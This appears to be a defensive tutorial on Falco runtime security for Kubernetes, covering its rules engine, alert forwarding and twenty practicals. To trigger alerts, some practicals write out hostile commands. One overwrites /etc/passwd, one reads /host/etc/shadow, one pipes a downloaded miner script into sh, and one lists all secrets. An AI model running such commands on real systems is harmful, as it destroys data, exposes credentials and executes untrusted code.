Falco provides runtime protection by continuously monitoring system calls inside Kubernetes nodes and containers. It detects suspicious behavior such as privilege escalation, file tampering, command execution inside containers, namespace escapes, and other anomaly patterns. Falco acts as the “intrusion detection system” for containerized workloads, enforcing real-time security visibility and alerting during runtime.
Understanding Falco Runtime Protection
Falco uses Linux kernel system calls (via eBPF or kernel module) to observe everything happening inside containers and nodes. It compares these actions against security rules to detect:
• abnormal behavior
• intrusion attempts
• privilege escalation
• unexpected process activity
• filesystem tampering
• network anomalies
• container breakouts
Falco enforces behavioral detection rather than static configuration checks.
How Falco Works Internally
Falco uses two core components:
System Call Capture
Falco captures syscalls using:
• eBPF probe (preferred)
• kernel module
These probes listen to:
• process creation
• file reads/writes
• network traffic
• capability usage
• mount operations
• exec events
• container metadata
This provides full runtime visibility.
Rules Engine
Falco evaluates events against rules. Rules describe conditions such as:
• unexpected shells
• writing to sensitive directories
• modifying binaries
• accessing host filesystem
• spawning processes in containers
• tampering with kubelet/cgroup files
• abusing capabilities
If a rule is triggered, Falco generates alerts.
Benefits in DevSecOps
Falco supports runtime DevSecOps by:
• detecting attacks after deployment
• providing behavioral monitoring
• enforcing least privilege runtime policies
• giving visibility into real container activity
• integrating with alerting and SIEM
• backing compliance requirements
Falco complements SAST, SCA, DAST, IAST, and PSS by monitoring the live environment.
What Falco Detects
Falco identifies runtime threats such as:
• exec of interactive shells (bash, sh)
• writing to /etc, /usr/bin, /proc
• modifying container binaries
• privilege escalation events
• use of sensitive capabilities (SYS_ADMIN, SYS_PTRACE)
• unexpected network connections
• crypto miner processes
• data exfiltration
• changes inside read-only root FS
• access to host paths
• creation of suspicious files
• Kubernetes API abuse
Falco rules are extremely flexible.
Falco Rules Overview
A Falco rule includes:
• condition (syscall + fields)
• filters (container checks, user IDs, capabilities)
• action (alert or log event)
• output format
Example rule structure:
- rule: Unexpected Shell
desc: Detect shells starting inside containers
condition: evt.type = execve and container.id != host and proc.name in ("bash","sh")
output: "Shell detected in container (%container.name) by (%proc.cmdline)"
priority: WARNING
Rules allow deep process-level control.
Falco Sidekick
Falco Sidekick sends Falco alerts to:
• Slack
• Discord
• Teams
• Kafka
• Elasticsearch
• Loki
• Webhooks
• CloudWatch
This enables automated response pipelines.
Falco vs Other Tools
Falco vs SIGs (logs)
Falco is real-time; logs are reactive.
Falco vs Admission Controllers
Admission controls pre-runtime, Falco monitors runtime.
Falco vs Network Policies
Falco detects violations, Network Policies enforce segmentation.
Falco vs eBPF Observability
Falco is security-oriented; observability tools are performance-oriented.
Falco Deployment Architecture
Falco runs as:
• DaemonSet
• eBPF probe
• sidecar agent
• host-based IDS
DaemonSet ensures one Falco instance per node.
Full-Length Practical Section
Hands-on runtime protection tasks to fully understand Falco.
Practical 1: Install Falco via Helm
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco
Falco installs as a DaemonSet.
Practical 2: Verify Falco Pods
kubectl get pods -n falco
Ensure all nodes run a Falco agent.
Practical 3: Trigger a Test Alert
Exec into container:
kubectl exec -it app -- sh
Falco triggers "Unexpected Shell in Container" alert.
Practical 4: View Falco Logs
kubectl logs -n falco <falco-pod>
Alerts show real-time events.
Practical 5: Detect File Modification
Write file inside container:
echo test > /etc/passwd
Falco detects suspicious write attempts.
Practical 6: Detect Privilege Escalation
Run privileged command:
capsh --print
Falco triggers capability abuse alert.
Practical 7: Create Custom Rule
Create rule file:
apiVersion: v1
kind: ConfigMap
metadata:
name: falco-rules
data:
custom.rules: |
- rule: No Exec in Data Path
desc: prevent executing binaries in /data
condition: evt.type = execve and proc.exepath startswith "/data"
output: "Unexpected execution in data path: %proc.cmdline"
priority: WARNING
Apply it to cluster.
Practical 8: Test Custom Rule
Run:
/data/script.sh
Falco detects execution.
Practical 9: Detect Kube API Abuse
Query sensitive API:
kubectl get secrets -A
If rule enabled, Falco flags unauthorized access.
Practical 10: Detect Sensitive File Reads
Try reading host file from container:
cat /host/etc/shadow
Falco detects host filesystem access.
Practical 11: Monitor Suspicious Network Traffic
Send traffic to external IP:
curl http://1.2.3.4
Falco triggers networking anomaly detection.
Practical 12: Detect Known Malware Processes
Run:
curl -L miner.sh | sh
Falco triggers crypto-mining rule.
Practical 13: Enable Sidekick
Install:
helm install falco-sidekick falcosecurity/falco-sidekick
Alerts start flowing to integrated outputs.
Practical 14: Send Alerts to Slack
Configure webhook URL in values file.
Practical 15: Send Alerts to SIEM
Send alerts to:
• ELK
• Splunk
• Datadog
Enable via Sidekick.
Practical 16: Automate Response Using KEDA (optional)
Falco → Sidekick → KEDA → scale down deployment automatically on threat.
Practical 17: Detect Container Escape Attempts
Test accessing cgroup files:
cat /proc/1/cgroup
Non-root container attempts trigger alerts.
Practical 18: Monitor Node-Level Events
Falco observes:
• unexpected user creation
• kernel module loading
• host-level command execution
Simulate host command:
sudo su -
Falco logs escalation if configured.
Practical 19: Integrate Falco with Istio/Linkerd
Observes sidecars + service mesh traffic patterns.
Practical 20: Build Full Runtime Protection Architecture
Architecture includes:
• Falco as DaemonSet with eBPF
• custom rules for workloads
• Sidekick sending alerts to Slack, SIEM, or webhooks
• automated remediation (delete pods, quarantine nodes)
• Kubernetes-native threat detection
• file integrity monitoring
• privilege escalation detection
• Kube API audit monitoring
This creates a complete runtime security model for DevSecOps.
Intel Dump
• Falco uses eBPF or kernel module to monitor syscalls in real time
• detects suspicious behavior such as shells, file tampering, capability abuse, escapes
• rules define conditions and alerts
• deployed as DaemonSet for node-wide monitoring
• Sidekick enables alert forwarding to SIEM/SOC
• practicals include installation, testing alerts, privilege detection, custom rules, API abuse detection, network anomalies, and full runtime protection architecture